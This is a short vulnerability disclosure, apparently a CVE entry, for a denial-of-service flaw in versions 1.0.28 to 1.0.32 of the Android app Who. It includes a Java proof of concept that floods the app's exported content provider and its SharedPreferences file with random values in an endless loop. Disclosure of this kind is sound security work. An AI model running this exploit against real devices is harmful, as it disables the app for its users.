Denial of Service exists in WHO(CVE-2023-27653)
Vendor:WHO(https://www.whoapp.live/)
Affected product:Who(com.scorp.who)
Version:1.0.28, 1.0.30, 1.0.32
Download link:https://play.google.com/store/apps/details?id=com.scorp.who
Description of the vulnerability for use in the CVE:An issue found in WHOv.1.0.28, v.1.0.30, v.1.0.32 allows an attacker to cause a denial of service via the SharedPreference files.
poc:
public void attack(){
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
String randomString =getRandomString(512);
Uri uri = Uri.parse("content://com.scorp.who.TTMultiProvider/t_sp/contain/" + "zztest" + "?sp_file_name=com.scorp.who_preferences");
while (true) {
ContentValues contentValues = new ContentValues();
contentValues.put(randomString,randomString);
contentResolver.insert(uri,contentValues);
}
}